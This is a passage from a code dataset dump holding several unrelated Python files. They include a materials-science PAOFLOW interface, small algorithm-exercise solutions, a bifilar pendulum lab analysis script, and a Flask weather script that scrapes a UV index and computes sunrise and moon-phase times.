_add_paopy_dos(oneCalc,ID,fermi_surf=False):\n paopy_input = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],'inputfile.xml')\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'do_dos','logical','T')\n if fermi_surf:\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'fermisurf','logical','T')\n\ndef _add_paopy_pdos(oneCalc,ID):\n paopy_input = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],'inputfile.xml')\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'do_pdos','logical','T')\n\n \ndef _add_paopy_bands(oneCalc,ID,nk=1000,topology=True,ipol=0,jpol=1,spol=2):\n\n paopy_input = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],'inputfile.xml')\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'do_bands','logical','T')\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'nk','int',nk)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'ipol','int',ipol)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'jpol','int',jpol)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'spol','int',spol)\n if topology==True:\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'band_topology','logical','T')\n\n\n if oneCalc['_AFLOWPI_ORIG_IBRAV_']==0:\n HSP,band_path = AFLOWpi.retr._getHighSymPoints(oneCalc,ID)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'band_path','character',band_path)\n temp_HSP_list=[]\n for k,v in list(HSP.items()):\n tmp = [k]\n tmp.extend(list(map(str,v)))\n temp_HSP_list.append(tmp)\n\n HSP_ARRAY= np.asarray(temp_HSP_list)\n\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'high_sym_points','string',HSP_ARRAY,degree=2)\n\n\ndef _add_paopy_transport(oneCalc,ID,t_tensor,t_min,t_max,t_step,carr_conc):\n paopy_input = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],'inputfile.xml')\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'Boltzmann','logical','T')\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'tmin','decimal',t_min)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'tmax','decimal',t_max)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'tstep','decimal',t_step)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'t_tensor','int',t_tensor,degree=2)\n if carr_conc:\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'carrier_conc','logical','T')\n\n\n\ndef _add_paopy_optical(oneCalc,ID,d_tensor):\n paopy_input = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],'inputfile.xml')\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'epsilon','logical','T')\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'d_tensor','int',d_tensor,degree=2)\n \ndef _add_paopy_spin_Hall(oneCalc,ID,s_tensor,spin_texture=False):\n paopy_input = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],'inputfile.xml')\n\n nl,sh = AFLOWpi.scfuj._get_spin_ordering(oneCalc,ID)\n\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'sh','int',sh,degree=1)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'nl','int',nl,degree=1)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'s_tensor','int',s_tensor,degree=2)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'spin_Hall','logical','T')\n\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'eminSH','decimal',-5.0)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'emaxSH','decimal',5.0)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'ac_cond_spin','logical','T')\n\n if spin_texture:\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'spintexture','logical','T')\n\ndef _add_paopy_Berry(oneCalc,ID,a_tensor):\n paopy_input = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],'inputfile.xml')\n\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'Berry','logical','T')\n\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'eminAH','decimal',-5.0)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'emaxAH','decimal',5.0)\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'ac_cond_Berry','logical','T')\n AFLOWpi.scfuj._add_paopy_xml(paopy_input,'a_tensor','int',a_tensor,degree=2)\n\n\ndef _mult_kgrid(oneCalc,mult=5.0):\n\n inputDict=AFLOWpi.retr._splitInput(oneCalc['_AFLOWPI_INPUT_'])\n kpt_str = inputDict['K_POINTS']['__content__'] \n try:\n mult[0]\n tmp_kps = kpt_str.split()[:3]\n k_grid = [int(np.ceil(float(tmp_kps[x])*mult[x])) for x in range(len(tmp_kps))]\n except:\n k_grid = [int(np.ceil(float(x)*mult)) for x in kpt_str.split()[:3]]\n\n return k_grid[0],k_grid[1],k_grid[2]\n \ndef _rename_boltz_files(oneCalc,ID):\n nspin = AFLOWpi.scfuj.chkSpinCalc(oneCalc,ID=ID)\n\n \n try:\n test_file = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],'Seebeck_0.dat')\n test_dat = np.loadtxt(test_file)\n temp = np.unique(test_dat[:,0])\n except Exception as e: \n return\n \n for T in range(temp.shape[0]):\n conv_dict={}\n if nspin!=1:\n conv_dict['Seebeck_0.dat'] = '%s_PAOFLOW_seebeck_up_%sK.dat'%(ID,int(temp[T])) \n conv_dict['sigma_0.dat'] = '%s_PAOFLOW_cond_up_%sK.dat'%(ID,int(temp[T])) \n conv_dict['kappa_0.dat'] = '%s_PAOFLOW_kappa_up_%sK.dat'%(ID,int(temp[T])) \n conv_dict['epsr_0.dat'] = '%s_PAOFLOW_epsilon_up_real.dat'%ID \n conv_dict['epsi_0.dat'] = '%s_PAOFLOW_epsilon_up_imag.dat'%ID \n\n conv_dict['Seebeck_1.dat'] = '%s_PAOFLOW_seebeck_down_%sK.dat'%(ID,int(temp[T])) \n conv_dict['sigma_1.dat'] = '%s_PAOFLOW_cond_down_%sK.dat'%(ID,int(temp[T])) \n conv_dict['kappa_1.dat'] = '%s_PAOFLOW_kappa_down_%sK.dat'%(ID,int(temp[T])) \n conv_dict['epsr_1.dat'] = '%s_PAOFLOW_epsilon_down_real.dat'%ID \n conv_dict['epsi_1.dat'] = '%s_PAOFLOW_epsilon_down_imag.dat'%ID \n else:\n conv_dict['Seebeck_0.dat'] = '%s_PAOFLOW_seebeck_%sK.dat'%(ID,int(temp[T])) \n conv_dict['sigma_0.dat'] = '%s_PAOFLOW_cond_%sK.dat'%(ID,int(temp[T])) \n conv_dict['kappa_0.dat'] = '%s_PAOFLOW_kappa_%sK.dat'%(ID,int(temp[T])) \n conv_dict['epsr_0.dat'] = '%s_PAOFLOW_epsilon_real.dat'%ID \n conv_dict['epsi_0.dat'] = '%s_PAOFLOW_epsilon_imag.dat'%ID \n\n for old,new in list(conv_dict.items()):\n old_split = old.split('_')\n try:\n xx = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],old_split[0]+'_xx_'+old_split[1])\n yy = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],old_split[0]+'_yy_'+old_split[1])\n zz = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],old_split[0]+'_zz_'+old_split[1])\n \n xx_arr = np.loadtxt(xx)\n yy_arr = np.loadtxt(yy)\n zz_arr = np.loadtxt(zz)\n\n comb_arr = np.concatenate((xx_arr[:,np.newaxis,0],xx_arr[:,np.newaxis,1],\n yy_arr[:,np.newaxis,1],zz_arr[:,np.newaxis,1] ),axis=1)\n new_path = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],new)\n\n np.savetxt(new_path,comb_arr)\n\n except Exception as e: \n try:\n dat = np.loadtxt(old)\n temp_dat = dat[np.where(dat[:,0]==temp[T])]\n np.savetxt(new,temp_dat[:,1:])\n except:\n pass\n\n\n\n\ndef _get_spin_ordering(oneCalc,ID):\n in_str = AFLOWpi.retr._getOutputString(oneCalc,ID+'_pdos')\n\n rename_info_re = re.compile(r'state #\\s*(\\d*): atom\\s*(\\d+)\\s*\\(\\s*(\\S*)\\s*\\).*wfc\\s*(\\d+).*l=(\\d+).*m_j=([\\s-][.\\d]+).*\\n')\n\n res = rename_info_re.findall(in_str)\n\n l_list= []\n for i in res:\n l_list.append([int(i[1]),int(i[4])])\n\n grouped_l = [list(g) for k, g in itertools.groupby(l_list)] \n sh = []\n nl = []\n print(grouped_l)\n for i in range(len(grouped_l)):\n sh.append(grouped_l[i][0][1])\n if grouped_l[i][0][1]==0:\n nl.append(len(grouped_l[i])/2)\n if grouped_l[i][0][1]==1:\n nl.append(len(grouped_l[i])/6)\n if grouped_l[i][0][1]==2:\n nl.append(len(grouped_l[i])/10)\n if grouped_l[i][0][1]==3:\n nl.append(len(grouped_l[i])/14)\n\n return nl,sh\n\n\ndef _rename_hall_files(oneCalc,ID):\n dirn = oneCalc[\"_AFLOWPI_FOLDER_\"]\n hall_files = [\"ahcEf_xy.dat\",\"MCDi_xy.dat\",\"MCDr_xy.dat\",\n \"SCDi_z_xy.dat\",\"SCDr_z_xy.dat\",\"shcEf_z_xy.dat\",]\n\n for fn in hall_files:\n old=os.path.join(dirn,fn)\n new=os.path.join(dirn,\"%s_%s\"%(ID,fn))\n try:\n os.rename(old,new)\n except: pass\n\n\n\n\ndef _rename_bands_files(oneCalc,ID):\n '''\n\n\n Arguments:\n\n\n Keyword Arguments:\n\n \n Returns:\n\n\n '''\n try:\n try:\n want_stdout_path = glob.glob(oneCalc['_AFLOWPI_FOLDER_']+'/kpath_points.txt')[-1]\n except:\n want_stdout_path = glob.glob(oneCalc['_AFLOWPI_FOLDER_']+'/%s_kpath_points.txt'%ID)[-1]\n\n with open(want_stdout_path,\"r\") as ofo:\n lines=ofo.readlines()\n\n output_path_string=\"\"\n flag=False\n points_list=[]\n for l in lines:\n if len(l.strip())==0:\n flag=True\n if flag==False:\n lspl=l.split()\n output_path_string+=\"0.0 0.0 0.0 %s ! %s\\n\"%(lspl[1],lspl[0])\n else:\n points_list.extend([float(x) for x in l.split()])\n\n points=np.reshape(np.asarray(points_list),(int(len(points_list)/3.0),3))\n\n r = np.diff(points,axis=0)\n\n dist=np.cumsum(np.sqrt(np.sum(r**2,axis=1)))\n dist = np.concatenate((np.array([0.0]),dist),axis=0)\n except: pass\n calcID = AFLOWpi.prep._return_ID(oneCalc,ID,step_type='PAO-TB',last=True)\n\n\n si= AFLOWpi.retr._splitInput(oneCalc[\"_AFLOWPI_INPUT_\"])\n try:\n nspin=int(si[\"&system\"][\"nspin\"]) \n except Exception as e: \n nspin=1\n\n\n\n if nspin==2:\n try:\n with open(\"bands_1.dat\",\"r\") as ofo:\n by_band = np.array([list(map(float,x.split())) for x in ofo.readlines()]).T\n ofs=\"\"\n for band in range(by_band.shape[0]):\n for kpt in range(by_band.shape[1]):\n ofs+=\"%s %s\\n\"%(dist[kpt],by_band[band,kpt])\n if band!=by_band.shape[0]-1:\n ofs+=\"\\n\"\n\n filebands = os.path.join(oneCalc[\"_AFLOWPI_FOLDER_\"],'%s_bands_paopy_down_cleaned.dat'%calcID)\n with open(filebands,\"w\") as ofo:\n ofo.write(ofs)\n except Exception as e: print(e)\n\n\n\n if nspin==2:\n filebands = os.path.join(oneCalc[\"_AFLOWPI_FOLDER_\"],'%s_bands_paopy_up_cleaned.dat'%calcID)\n else:\n filebands = os.path.join(oneCalc[\"_AFLOWPI_FOLDER_\"],'%s_bands_paopy_cleaned.dat'%calcID)\n\n with open(os.path.join(oneCalc[\"_AFLOWPI_FOLDER_\"],\"bands_0.dat\"),\"r\") as ofo:\n by_band = np.array([list(map(float,x.split())) for x in ofo.readlines()]).T\n\n try:\n ofs=\"\"\n for band in range(1,by_band.shape[0]):\n for kpt in range(by_band.shape[1]):\n ofs+=\"%s %s\\n\"%(dist[kpt],by_band[band,kpt])\n if band!=by_band.shape[0]-1:\n ofs+=\"\\n\" \n\n with open(filebands,\"w\") as ofo:\n ofo.write(ofs)\n except Exception as e:\n AFLOWpi.run._fancy_error_log(e)\n raise SystemExit\n pass\n \n nfm = os.path.join(oneCalc['_AFLOWPI_FOLDER_'],'%s_kpath_points.txt'%ID)\n try:\n os.rename(want_stdout_path,nfm)\n except: pass\n","repo_name":"marcofornari/AFLOWpi","sub_path":"src/scfuj/src/paopy_interface.py","file_name":"paopy_interface.py","file_ext":"py","file_size_in_byte":19665,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"56"} +{"seq_id":"31844102988","text":"import timeit\nimport math\n\ndef v34_1():\n sum_of_all=0\n upper_limit=math.factorial(9)*7\n #because 9!8 -> is also a 7 digit number\n for x in range(3,upper_limit):\n sum_factorial=0\n for a in str(x):\n sum_factorial+=math.factorial(int(a))\n if (sum_factorial==x):\n sum_of_all+=x\n return sum_of_all \n\n#print(v34_1())--> Answer 40730\nprint(timeit.timeit(v34_1,number=10)/10)\n#5.940520286599996sec","repo_name":"SebNik/Project-Euler","sub_path":"34_1.py","file_name":"34_1.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"10725841039","text":"T = int(input())\n\nfor tc in range(1, T+1):\n case = int(input())\n grade = list(map(int, input().split()))\n arr = [0] * 101\n for i in grade:\n arr[i] += 1\n mx = 0\n for i in range(101):\n if arr[mx] <= arr[i]:\n mx = i\n\n print(\"#{} {}\".format(tc, mx))\n # print(target)","repo_name":"tykimdream/algorithm","sub_path":"ssafy-coding-test/SWEA/D2/1204.py","file_name":"1204.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"23073296185","text":"#-----------------------------------------------------------------\n# Import Required Packages\n#-----------------------------------------------------------------\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom statistics import mean\nfrom scipy.signal import find_peaks\nimport math\n\n\n#-----------------------------------------------------------------\n#-----------------------------------------------------------------\n# When reading from your own data:\n# --> Go to File and Open \n# --> Open CSV file in Python and rename first row variables: Time,omegax,omegay,omegaz,omegaa\n# --> Then save and close the CSV file\n#-----------------------------------------------------------------\n#-----------------------------------------------------------------\nfilename = 'raw_data.csv' # Update filename with your own data file\n\n\n#-----------------------------------------------------------------\n# Bifilar Pendulum variables\n# Fill in Bifilar and phone dimensions\n# Based on Ogata PDF variable names\n#-----------------------------------------------------------------\nh = 0.7112 # [m], bifilar string length\na = 0.0445 # [m], length between files/2\nL = 0.1447 # [m], length of phone (horizontal --> parallel to ground)\nt = 0.008 # [m], thickness of phone\nm = 0.151 # [kg], phone mass\n\n#-----------------------------------------------------------------\n# Read CSV file and index the columns using the renamed column header names\n#-----------------------------------------------------------------\ncsvdata = pd.read_csv(filename)\n\nT = csvdata.Time\nwx = csvdata.omegax\nwy = csvdata.omegay\nwz = csvdata.omegaz\n \n#-----------------------------------------------------------------\n# Plot raw data: wx, wy, and wz versus Time [s]\n# --> Use this to find the time values where your oscillation begins/ends\n#----------------------------------------------------------------- \nplt.figure(1)\nplt.plot(T, wx)\nplt.plot(T, wy)\nplt.plot(T, wz)\nplt.xlabel(\"Time (s)\")\nplt.ylabel(\"Angular Velocity (rad/s)\")\nplt.legend([\"wx\", \"wy\", \"wz\"])\nplt.title(\"Angular Velocity vs Time\")\nplt.grid()\nplt.show()\n\n#-----------------------------------------------------------------\n# Analyze a subset of the data\n# --> it1 is the time index right before the oscillation begins\n# --> it1 is the time index where the oscillation ends\n# --> Example: I wanted to analyze a signal from T = 6 - 60 seconds\n# so I found the T[it1] value that was close to 6 s\n# and the T[it2] value that was close to 60 s\n#-----------------------------------------------------------------\n\nit1,it2 = 6800,21088 # Update these iteration values for your own data\nTpend = T[it1:it2]\nwxpend = wx[it1:it2]\n\n\n#-----------------------------------------------------------------\n#-----------------------------------------------------------------\n# Find the peaks of the subset\n# This section should work without any code updates\n# **Only update the distance value here if peaks are not matching**\n# --> Larger distance integer value forces more points between peaks\n#-----------------------------------------------------------------\n#-----------------------------------------------------------------\nwx_its, _ = find_peaks(list(wxpend),height=0,distance = 50) # solves for peak iteration values\nwx_its = wx_its+it1 # Shifts iteration values by it1\nwx_peaks = wxpend[wx_its] # Solves for peak values using wx_its iteration values\nTx_peaks = Tpend[wx_its] # Solves for time peak values occur using wx_its iteration values\n\n#-----------------------------------------------------------------\n# Calculate Average Period\n# **This section does not require updating**\n#\n# For loop is used to calculate time between peaks\n# Mean function is used to calculate average period\n#-----------------------------------------------------------------\nTperiod = []\nfor i in range(len(wx_peaks)):\n if(i>0):\n Tperiod.append(Tx_peaks[wx_its[i]] - Tx_peaks[wx_its[i-1]])\n\nTp_avg = mean(Tperiod)\nprint(\"T Avg [s] =\",Tp_avg)\n\n#-----------------------------------------------------------------\n# Solve for J values\n# Theoretical (th) uses only phone mass and dimensions\n# Experimental (exp) uses measured period, phone mass, and filar dimensions\n#-----------------------------------------------------------------\nJth = 1/12*m*(t**2 + L**2)\nJexp = (Tp_avg/2/math.pi)**2*m*9.81*(a)**2/h\n\n# Print functions do not require updates\nprint(\"J experimental [kg*m^2] = % 5.6f\" %(Jexp))\nprint(\"J theoretical [kg*m^2] = % 5.6f\" %(Jth))\n\n#-----------------------------------------------------------------\n# Plot oscillation and peak data\n# --> Plot Tpend and wxpend data\n# --> Scatter plot Tx_peaks and wx_peaks with red x markers\n#-----------------------------------------------------------------\nplt.figure(2)\nplt.plot(Tpend, wxpend)\nplt.scatter(Tx_peaks, wx_peaks, marker='x', color = 'r')\nplt.xlabel(\"Time (s)\")\nplt.ylabel(\"Angular Velocity (rad/s)\")\nplt.title(\"Angular Velocity vs Time\")\nplt.legend([\"All data\", \"Peak data\"])\nplt.grid()\nplt.show()","repo_name":"kierancoz/dyn_sys_controls","sub_path":"lab2/Bifilar_Pendulum_Student_File.py","file_name":"Bifilar_Pendulum_Student_File.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"29508978608","text":"import math\ndef solution(n, k):\n \n # 1 2 3\n # 1 3 2\n # 2 1 3\n # 2 3 1\n # 3 1 2\n # 3 2 1\n \n # n 명에게 번호를 붙여 리스트 업\n people = [i for i in range(1, n + 1)]\n result = [] \n \n while n:\n # n명일때 줄을 서는 방법은 n!(factorial)에 해당 하고 이걸 n명으로 나누면 한명이 맨앞에 나왔을때의 가지 ���가 된다.\n one_case = math.factorial(n) // n\n # 전체 경우 수 중에서 k번째니까 k를 한명의 경우의 수로 나누면 k번째가 몇번째 사람인지 알수있다.\n people_num = k // one_case\n # k를 한명의 경우의 수로 나눈 나머지는 위에서 알게된 몇번째 사람의 몇번째 경우의 수인지 알수있다.\n k %= one_case \n \n if k == 0: result.append(people.pop(people_num - 1)) # 나머지가 0인 경우는 해당 번째 이전 사람의 마지막 경우이므로 전사람을 배치\n else: result.append(people.pop(people_num)) # 해당 번째 사람 배치\n \n n -= 1 # 한명은 자리를 잡았으니 다음 번에 이 사람을 제외하고 자리잡도록 한명 제외\n \n return result","repo_name":"littlezero48/Study-algorithm","sub_path":"프로그래머스/lv2/12936. 줄 서는 방법/줄 서는 방법.py","file_name":"줄 서는 방법.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"3867992831","text":"import libraries_used as lu\nimport read_csv_data as rcd\n\n#--------Census Data Dropdown Prepare------------------------------------------------------------------\n# census_data_df = lu.pd.read_csv('Data/census_2015_data.csv')\n# census_data_columns = list(census_data_df.columns.values)\ncensus_data_columns = list(rcd.census_2015_data.columns.values)\ncensus_del_data = ['GEOID','year','name','parent_location']\n\ncensus_data_columns = [i for i in census_data_columns if i not in census_del_data]\nfor i in range(0, len(census_data_columns)):\n if 'pct' in census_data_columns[i]:\n x, y = census_data_columns[i].split(\"pct_\")\n census_data_columns[i] = \"% of \"+ y\n # census_data_columns[i] = census_data_columns[i].replace(\"_\", \" \")\n if '_' in census_data_columns[i]:\n census_data_columns[i] = census_data_columns[i].replace(\"_\", \" \")\n\n#-------------------------------------------------------------------------------------------------------\n\n\n#--------Slider Prepare----------------------------------------------------------------\nyears = [2015, 2016, 2017, 2018]\n#--------------------------------------------------------------------------------------\n\n\n#---------------------------------Counties Mapping------------------------------------------\nwith lu.urlopen('https://raw.githubusercontent.com/plotly/datasets/master/geojson-counties-fips.json') as response:\n counties = lu.json.load(response)\n\n\n\n#---------------------------------Zip Code Mapping------------------------------------------\n# # with open('C://Users//Akshay//Desktop//Masters Project//S_SQUARE_LAB//Data//New_York.topo.json') as response1:\n# # zipcodes = lu.json.load(response1)\n#\n# zipcodes_data_df = lu.pd.read_csv('Data/New_York_State_ZIP_Codes-County_FIPS_Cross-Reference.csv')\n#----------------------------------------------------------------------------------------------------\n\n#--------------------Map Level----------------------------------------------------------\nmap_level = ['Auto', 'Counties', 'Zip Code']\n# #---------------------------------------------------------------------------------------\n\n#----------------------------------------------------------------------------------------------------\n\n# livability_index_data = lu.pd.read_csv('Data/liviability_index_data.csv')\n# zipcode_livability_index_data = lu.pd.read_csv('Data/ny_zip_code_livability_details.csv')\n\n#------------------------------------------------------------------------------------------------------\ndata_211_categories = {'B':'Basic Needs','D':\"Consumer Services\",'F':'Criminal Justice and Legal Services',\n 'H': 'Education', 'J': 'Environment and Public Health/Safety', 'L': 'Health Care',\n 'N': 'Income Support and Employment', 'P': 'Individual and Family Life',\n 'R': 'Mental Health and Substance Use', 'T': 'Organizational/Community/International Services',\n 'Y': 'Target Populations' }\n\ndata_211_categories_num = {'B': 1, 'D': 2, 'F': 3,\n 'H': 4, 'J': 5, 'L': 6,\n 'N': 7, 'P': 8, 'R': 9,\n 'T': 10,'X':11, 'Y': 12}\n\n\ndata_211_sub_categories = {'B': ['BD', 'BH', 'BM', 'BT', 'BV'],\n 'D': ['DD', 'DF', 'DM', 'DT'],\n 'F': ['FC', 'FF', 'FJ', 'FL', 'FN', 'FP', 'FR', 'FT'],\n 'H': ['HD', 'HH', 'HL'],\n 'J': ['JP', 'JR'],\n 'L': ['LD', 'LE', 'LF', 'LH', 'LJ', 'LL', 'LN', 'LR', 'LT', 'LV'],\n 'N': ['ND', 'NL', 'NS', 'NT'],\n 'P': ['PB', 'PD', 'PH', 'PL', 'PN', 'PS', 'PW', 'PX'],\n 'R': ['RF', 'RM', 'RP', 'RR', 'RX'],\n 'T': ['TB', 'TC', 'TD', 'TE', 'TH', 'TI', 'TJ', 'TM', 'TN', 'TO', 'TP'],\n 'Y': ['YB', 'YC', 'YF', 'YJ', 'YK', 'YL', 'YM', 'YN', 'YO', 'YP', 'YS', 'YT', 'YV', 'YX', 'YZ']}\n\n\ndata_211_sub_categories_text = {'B': ['Food','Housing/Shelter','Material Goods','Transportation','Utilities'],\n 'D': ['Consumer Assistance and Protection','Consumer Regulation','Money Management',\n 'Tax Organizations and Services'],\n 'F': ['Courts','Criminal Correctional System','Judicial Services','Law Enforcement Agencies',\n 'Law Enforcement Services','Legal Assistance Modalities','Legal Expense Insurance','Legal Services'],\n 'H': ['Educational Institutions/Schools','Educational Programs','Educational Support Services'],\n 'J': ['Environmental Protection and Improvement','Public Health','Public Safety'],\n 'L': ['Emergency Medical Care','General Medical Care','Health Screening/Diagnostic Services',\n 'Health Supportive Services','Human Reproduction','Inpatient Health Facilities',\n 'Outpatient Health Facilities','Rehabilitation/Habilitation Services',\n 'Specialized Treatment and Prevention','Specialty Medicine'],\n 'N': ['Employment','Public Assistance Programs','Social Insurance Programs','Temporary Financial Assistance'],\n 'P': ['Death Certification/Burial Arrangements','Domestic Animal Services','Individual and Family Support Services',\n 'Leisure Activities/Recreation','Mutual Support','Social Development and Enrichment',\n 'Volunteer Development','Volunteer Opportunities'],\n 'R': ['Counseling Settings','Mental Health Care Facilities',\n 'Mental Health Assessment and Treatment','Mental Health Support Services',\n 'Substance Use Disorder Services'],\n 'T': ['Community Economic Development and Finance','Community Facilities/Centers','Community Groups and Government/Administrative Offices',\n 'Community Planning and Public Works','Disaster Services','Donor Services','Information Services','Military Service',\n 'Occupational/Professional Associations','Organizational Development and Management Delivery Methods',\n 'Organizational Development and Management Services'],\n 'Y': ['Age Groups','Benefits Recipients','Disabilities and Health Conditions','Families and Individuals Needing Support',\n 'Family Relationships','Income/Employment Status', 'Living Situation/Housing Status','Military Personnel/Contractors',\n 'Occupations','Offenders','Sex/Gender','Sexual Orientation/Gender Identity','Transients',\n 'Victims/Survivors','Topical Identifiers/Issues']}\n\n#------------------------------------------------------------------------------------------------------\n#------------------------------------------------------------------------------------------------------\ndata_211_categories_l = list(data_211_categories.values())\nkey_list = list(data_211_categories.keys())\nval_list = list(data_211_categories.values())\n\n","repo_name":"akshaygujjari/S_SQUARE_LAB","sub_path":"read_data.py","file_name":"read_data.py","file_ext":"py","file_size_in_byte":7339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"10600191140","text":"from flask import Flask, render_template, redirect, url_for, request, Blueprint\nimport bs4\nimport requests\nfrom datetime import datetime\nfrom astral import LocationInfo\nfrom datetime import *\nfrom astral.sun import sun\nfrom astral import moon\n\n### SUN/MOON Data #########\nmoon_phase = moon.phase(datetime.today())\ndef moonphase():\n if moon_phase >= 0 and moon_phase < 1.1:\n return('New Moon')\n if moon_phase >= 1.1 and moon_phase < 6.38:\n return('Waxing Crescent')\n if moon_phase >= 6.38 and moon_phase < 8.38:\n return('First Quarter')\n if moon_phase >= 8.38 and moon_phase < 13.76:\n return('Waxing Gibbous')\n if moon_phase >= 13.76 and moon_phase < 15.77:\n return('Full Moon')\n if moon_phase >= 15.77 and moon_phase < 21.14:\n return('Waning Gibbous')\n if moon_phase >= 21.14 and moon_phase < 23.14:\n return('Last Quarter')\n if moon_phase >= 23.14 and moon_phase < 28.53:\n return('Waning Crescent')\n if moon_phase >= 28.53 and moon_phase < 29.54:\n return('New Moon')\n\nmoon = (moonphase())\ntday = datetime.today()\n\ndef sr_ss(city, lat, long):\n city = LocationInfo(city, \"USA\", \"US/Hawaii\", lat, long)\n\n s = sun(city.observer, date=tday, tzinfo=city.timezone)\n\n dawn = (f'{s[\"dawn\"]}')\n sunrise = (f'{s[\"sunrise\"]}')\n sunset = (f'{s[\"sunset\"]}')\n dusk = (f'{s[\"dusk\"]}')\n\n dawn_clean = dawn.split('.')[0].replace('-', '/')\n sunrise_clean = sunrise.split('.')[0].replace('-', '/')\n sunset_clean = sunset.split('.')[0].replace('-', '/')\n dusk_clean = dusk.split('.')[0].replace('-', '/')\n\n dawn = datetime.strptime(dawn_clean, \"%Y/%m/%d %H:%M:%S\")\n dawn_strf = dawn.strftime(\"%I:%M %p\")\n\n sunrise = datetime.strptime(sunrise_clean, \"%Y/%m/%d %H:%M:%S\")\n sunrise_strf = sunrise.strftime(\"%I:%M %p\")\n\n sunset = datetime.strptime(sunset_clean, \"%Y/%m/%d %H:%M:%S\")\n sunset_strf = sunset.strftime(\"%I:%M %p\")\n\n dusk = datetime.strptime(dusk_clean, \"%Y/%m/%d %H:%M:%S\")\n dusk_strf = dusk.strftime(\"%I:%M %p\")\n\n return(dawn_strf, sunrise_strf, sunset_strf, dusk_strf)\n\nhnl_sr_ss = sr_ss(\"Honolulu\", 21.315603, -157.858093)\nhnl_dawn = hnl_sr_ss[0]\nhnl_sr = hnl_sr_ss[1]\nhnl_ss = hnl_sr_ss[2]\nhnl_dusk = hnl_sr_ss[3]\n\n\nnow = datetime.now()\ncurrent_time = now.strftime(\"%H:%M:%S\")\n\nif int(now.strftime(\"%H\")) >= 23 or int(now.strftime(\"%H\")) < 2:\n curr_time = \"11pm\"\nif int(now.strftime(\"%H\")) >= 2 and int(now.strftime(\"%H\")) < 5:\n curr_time = \"2am\"\nif int(now.strftime(\"%H\")) >= 5 and int(now.strftime(\"%H\")) < 8:\n curr_time = \"5am\"\nif int(now.strftime(\"%H\")) >= 8 and int(now.strftime(\"%H\")) < 11:\n curr_time = \"8am\"\nif int(now.strftime(\"%H\")) >= 11 and int(now.strftime(\"%H\")) < 14:\n curr_time = \"11am\"\nif int(now.strftime(\"%H\")) >= 14 and int(now.strftime(\"%H\")) < 17:\n curr_time = \"2pm\"\nif int(now.strftime(\"%H\")) >= 17 and int(now.strftime(\"%H\")) < 20:\n curr_time = \"5pm\"\nif int(now.strftime(\"%H\")) >= 20 and int(now.strftime(\"%H\")) < 23:\n curr_time = \"8pm\"\n\n######################### UV Index\nres = requests.get('https://forecast.weather.gov/product.php?site=CRH&product=UVI&issuedby=CAC')\nres.raise_for_status()\nbs4.BeautifulSoup(res.text, features='lxml')\n\nsoup = bs4.BeautifulSoup(res.text, features='lxml')\nsoup.find('#local > pre')\n\nuvi1 = soup.select('#local > pre')\n\nuvi2 = uvi1[0]\nuvi3 = str(uvi2)\nuvi4 = uvi3[0:-1]\n\nuvi5 = uvi4.index('HONOLULU')\nuvi6 = uvi4.index('SEATTLE')\n\nuvi7 = int(uvi5)\nuvi8 = int(uvi6)\n\ncity = uvi3[uvi7:uvi7 + 8]\nindexnum = int(uvi3[uvi6 - 10:uvi6])\nindexnumstring = (uvi3[uvi6 - 10:uvi6])\n\nif indexnum in range(0, 3):\n explvl = \"Low\"\nif indexnum in range(3, 6):\n explvl = \"Moderate\"\nif indexnum in range(6, 8):\n explvl = \"High\"\nif indexnum in range(8, 11):\n explvl = \"Very High\"\nif indexnum > 10:\n explvl = \"Extreme\"\n\n################ Synopsis ################\n#\n# res = 